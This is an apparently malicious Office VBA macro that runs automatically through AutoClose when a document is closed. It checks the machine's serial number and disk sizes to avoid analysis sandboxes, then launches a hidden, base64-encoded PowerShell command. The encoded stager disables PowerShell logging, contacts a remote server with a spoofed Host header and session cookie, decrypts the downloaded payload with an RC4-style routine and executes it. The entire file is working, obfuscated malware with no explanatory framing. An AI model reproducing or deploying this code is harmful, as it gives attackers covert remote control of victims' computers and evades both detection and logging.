Sub AutoClose()
	pnPk
End Sub

Public Function pnPk() As Variant
	strComputer = "."
	Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
	Set ID = objWMIService.ExecQuery("Select IdentifyingNumber from Win32_ComputerSystemproduct")
	For Each objItem In ID
		If StrComp(objItem.IdentifyingNumber, "2UA20511KN") = 0 Then End
	Next
	Set disksize = objWMIService.ExecQuery("Select Size from Win32_logicaldisk")
	For Each objItem In disksize
		If (objItem.Size = 42949603328#) Then End
		If (objItem.Size = 68719443968#) Then End
	Next
	Dim gFFOloqohnNUqq As String
	gFFOloqohnNUqq = "powershell -noP -sta -w 1 -enc  SQBmACgAJABQAFMAVg"
	gFFOloqohnNUqq = gFFOloqohnNUqq + "BlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBp"
	gFFOloqohnNUqq = gFFOloqohnNUqq + "AG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAWwBTAH"
	gFFOloqohnNUqq = gFFOloqohnNUqq + "kAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAEUA"
	gFFOloqohnNUqq = gFFOloqohnNUqq + "dgBlAG4AdABpAG4AZwAuAEUAdgBlAG4AdABQAHIAbwB2AGkAZA"
	gFFOloqohnNUqq = gFFOloqohnNUqq + "BlAHIAXQAuAEcAZQB0AEYAaQBlAGwAZAAoACcAbQBfAGUAbgBh"
	gFFOloqohnNUqq = gFFOloqohnNUqq + "AGIAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABJAG"
	gFFOloqohnNUqq = gFFOloqohnNUqq + "4AcwB0AGEAbgBjAGUAJwApAC4AUwBlAHQAVgBhAGwAdQBlACgA"
	gFFOloqohnNUqq = gFFOloqohnNUqq + "WwBSAGUAZgBdAC4AQQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQAVA"
	gFFOloqohnNUqq = gFFOloqohnNUqq + "B5AHAAZQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBt"
	gFFOloqohnNUqq = gFFOloqohnNUqq + "AGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAFQAcgBhAG"
	gFFOloqohnNUqq = gFFOloqohnNUqq + "MAaQBuAGcALgBQAFMARQB0AHcATABvAGcAUAByAG8AdgBpAGQA"
	gFFOloqohnNUqq = gFFOloqohnNUqq + "ZQByACcAKQAuAEcAZQB0AEYAaQBlAGwAZAAoACcAZQB0AHcAUA"
	gFFOloqohnNUqq = gFFOloqohnNUqq + "ByAG8AdgBpAGQAZQByACcALAAnAE4AbwBuAFAAdQBiAGwAaQBj"
	gFFOloqohnNUqq = gFFOloqohnNUqq + "ACwAUwB0AGEAdABpAGMAJwApAC4ARwBlAHQAVgBhAGwAdQBlAC"
	gFFOloqohnNUqq = gFFOloqohnNUqq + "gAJABuAHUAbABsACkALAAwACkAOwB9ADsAWwBTAHkAcwB0AGUA"
	gFFOloqohnNUqq = gFFOloqohnNUqq + "bQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQ"
	gFFOloqohnNUqq = gFFOloqohnNUqq + "BhAG4AYQBnAGUAcgBdADoAOgBFAHgAcABlAGMAdAAxADAAMABD"
	gFFOloqohnNUqq = gFFOloqohnNUqq + "AG8AbgB0AGkAbgB1AGUAPQAwADsAJABLAD0AWwBTAHkAcwB0AG"
	gFFOloqohnNUqq = gFFOloqohnNUqq + "UAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoA"
	gFFOloqohnNUqq = gFFOloqohnNUqq + "QQBTAEMASQBJAC4ARwBlAHQAQgB5AHQAZQBzACgAJwBJAHYAVg"
	gFFOloqohnNUqq = gFFOloqohnNUqq + "BeAFkAOgBGAHQAZgBDAFgAVAAsAD0AYQBBAE0APwBqACMANwBP"
	gFFOloqohnNUqq = gFFOloqohnNUqq + "AFEAcABdACYAcgB8AFsAWgB4AG4AJwApADsAJABSAD0AewAkAE"
	gFFOloqohnNUqq = gFFOloqohnNUqq + "QALAAkAEsAPQAkAEEAcgBnAHMAOwAkAFMAPQAwAC4ALgAyADUA"
	gFFOloqohnNUqq = gFFOloqohnNUqq + "NQA7ADAALgAuADIANQA1AHwAJQB7ACQASgA9ACgAJABKACsAJA"
	gFFOloqohnNUqq = gFFOloqohnNUqq + "BTAFsAJABfAF0AKwAkAEsAWwAkAF8AJQAkAEsALgBDAG8AdQBu"
	gFFOloqohnNUqq = gFFOloqohnNUqq + "AHQAXQApACUAMgA1ADYAOwAkAFMAWwAkAF8AXQAsACQAUwBbAC"
	gFFOloqohnNUqq = gFFOloqohnNUqq + "QASgBdAD0AJABTAFsAJABKAF0ALAAkAFMAWwAkAF8AXQB9ADsA"
	gFFOloqohnNUqq = gFFOloqohnNUqq + "JABEAHwAJQB7ACQASQA9ACgAJABJACsAMQApACUAMgA1ADYAOw"
	gFFOloqohnNUqq = gFFOloqohnNUqq + "AkAEgAPQAoACQASAArACQAUwBbACQASQBdACkAJQAyADUANgA7"
	gFFOloqohnNUqq = gFFOloqohnNUqq + "ACQAUwBbACQASQBdACwAJABTAFsAJABIAF0APQAkAFMAWwAkAE"
	gFFOloqohnNUqq = gFFOloqohnNUqq + "gAXQAsACQAUwBbACQASQBdADsAJABfAC0AYgB4AG8AcgAkAFMA"
	gFFOloqohnNUqq = gFFOloqohnNUqq + "WwAoACQAUwBbACQASQBdACsAJABTAFsAJABIAF0AKQAlADIANQ"
	gFFOloqohnNUqq = gFFOloqohnNUqq + "A2AF0AfQB9ADsAJAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0"
	gFFOloqohnNUqq = gFFOloqohnNUqq + "ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAG"
	gFFOloqohnNUqq = gFFOloqohnNUqq + "UAbgB0ADsAJABzAGUAcgA9ACQAKABbAFQAZQB4AHQALgBFAG4A"
	gFFOloqohnNUqq = gFFOloqohnNUqq + "YwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQ"
	gFFOloqohnNUqq = gFFOloqohnNUqq + "B0AFMAdAByAGkAbgBnACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6"
	gFFOloqohnNUqq = gFFOloqohnNUqq + "AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAnAG"
	gFFOloqohnNUqq = gFFOloqohnNUqq + "EAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEA"
	gFFOloqohnNUqq = gFFOloqohnNUqq + "eABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBOAGcAQQA0AEEAQw"
	gFFOloqohnNUqq = gFFOloqohnNUqq + "A0AEEATQBnAEEAeABBAEMANABBAE0AUQBBAHkAQQBEAGcAQQBP"
	gFFOloqohnNUqq = gFFOloqohnNUqq + "AGcAQQA0AEEARABBAEEAJwApACkAKQA7ACQAdAA9ACcALwB3AH"
	gFFOloqohnNUqq = gFFOloqohnNUqq + "AALQBjAG8AbgB0AGUAbgB0AC8AdABoAGUAbQBlAHMALwB3AHAA"
	gFFOloqohnNUqq = gFFOloqohnNUqq + "LQBmAHIAbwBuAHQALgBwAGgAcAAnADsAJAB3AGMALgBQAHIAbw"
	gFFOloqohnNUqq = gFFOloqohnNUqq + "B4AHkAPQBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBS"
	gFFOloqohnNUqq = gFFOloqohnNUqq + "AGUAcQB1AGUAcwB0AF0AOgA6AEQAZQBmAGEAdQBsAHQAVwBlAG"
	gFFOloqohnNUqq = gFFOloqohnNUqq + "IAUAByAG8AeAB5ADsAJAB3AGMALgBQAHIAbwB4AHkALgBDAHIA"
	gFFOloqohnNUqq = gFFOloqohnNUqq + "ZQBkAGUAbgB0AGkAYQBsAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQ"
	gFFOloqohnNUqq = gFFOloqohnNUqq + "AuAE4AZQB0AC4AQwByAGUAZABlAG4AdABpAGEAbABDAGEAYwBo"
	gFFOloqohnNUqq = gFFOloqohnNUqq + "AGUAXQA6ADoARABlAGYAYQB1AGwAdABOAGUAdAB3AG8AcgBrAE"
	gFFOloqohnNUqq = gFFOloqohnNUqq + "MAcgBlAGQAZQBuAHQAaQBhAGwAcwA7ACQAUwBjAHIAaQBwAHQA"
	gFFOloqohnNUqq = gFFOloqohnNUqq + "OgBQAHIAbwB4AHkAIAA9ACAAJAB3AGMALgBQAHIAbwB4AHkAOw"
	gFFOloqohnNUqq = gFFOloqohnNUqq + "AkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACIAVQBz"
	gFFOloqohnNUqq = gFFOloqohnNUqq + "AGUAcgAtAEEAZwBlAG4AdAAiACwAIgBNAG8AegBpAGwAbABhAC"
	gFFOloqohnNUqq = gFFOloqohnNUqq + "8ANQAuADAAIAAoAFcAaQBuAGQAbwB3AHMAIABOAFQAIAA2AC4A"
	gFFOloqohnNUqq = gFFOloqohnNUqq + "MwA7ACAAVwBpAG4ANgA0ADsAIAB4ADYANAApACAAQQBwAHAAbA"
	gFFOloqohnNUqq = gFFOloqohnNUqq + "BlAFcAZQBiAEsAaQB0AC8ANQAzADcALgAzADYAIAAoAEsASABU"
	gFFOloqohnNUqq = gFFOloqohnNUqq + "AE0ATAAsACAAbABpAGsAZQAgAEcAZQBjAGsAbwApACAAQwBoAH"
	gFFOloqohnNUqq = gFFOloqohnNUqq + "IAbwBtAGUALwA3ADkALgAwAC4AMwA5ADQANQAuADgAOAAgAFMA"
	gFFOloqohnNUqq = gFFOloqohnNUqq + "YQBmAGEAcgBpAC8ANQAzADcALgAzADYAIgApADsAdAByAHkAew"
	gFFOloqohnNUqq = gFFOloqohnNUqq + "AkAGkAZwA9ACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0"
	gFFOloqohnNUqq = gFFOloqohnNUqq + "AGEAKAAkAHMAZQByACkAfQBjAGEAdABjAGgAewB9ADsAJAB3AG"
	gFFOloqohnNUqq = gFFOloqohnNUqq + "MALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAiAEgAbwBzAHQA"
	gFFOloqohnNUqq = gFFOloqohnNUqq + "IgAsACIAdwBtAHcAaQBmAGIAYQBqAHgAeABiAGMAeABtAHUAYw"
	gFFOloqohnNUqq = gFFOloqohnNUqq + "B4AG0AbABjAC4AYwBvAG0AIgApADsAJAB3AGMALgBIAGUAYQBk"
	gFFOloqohnNUqq = gFFOloqohnNUqq + "AGUAcgBzAC4AQQBkAGQAKAAiAEMAbwBvAGsAaQBlACIALAAiAH"
	gFFOloqohnNUqq = gFFOloqohnNUqq + "MAZQBzAHMAaQBvAG4APQA5ADYAUgBUAGgAYwA1AC8AcAB6ADQA"
	gFFOloqohnNUqq = gFFOloqohnNUqq + "QwB2AGQAZgB4AG8AVQA1AFMAOAAvADQAagBCAE0ARQAlADMARA"
	gFFOloqohnNUqq = gFFOloqohnNUqq + "AiACkAOwAkAGQAYQB0AGEAPQAkAHcAYwAuAEQAbwB3AG4AbABv"
	gFFOloqohnNUqq = gFFOloqohnNUqq + "AGEAZABEAGEAdABhACgAJABzAGUAcgArACQAdAApADsAJABpAH"
	gFFOloqohnNUqq = gFFOloqohnNUqq + "YAPQAkAGQAYQB0AGEAWwAwAC4ALgAzAF0AOwAkAGQAYQB0AGEA"
	gFFOloqohnNUqq = gFFOloqohnNUqq + "PQAkAGQAYQB0AGEAWwA0AC4ALgAoACQAZABhAHQAYQAuAGwAZQ"
	gFFOloqohnNUqq = gFFOloqohnNUqq + "BuAGcAdABoAC0AMQApAF0AOwAtAGoAbwBpAG4AWwBDAGgAYQBy"
	gFFOloqohnNUqq = gFFOloqohnNUqq + "AFsAXQBdACgAJgAgACQAUgAgACQAZABhAHQAYQAgACgAJABJAF"
	gFFOloqohnNUqq = gFFOloqohnNUqq + "YAKwAkAEsAKQApAHwASQBFAFgA"
	Set asd = CreateObject("WScript.Shell")
	asd.Run(gFFOloqohnNUqq)
End Function
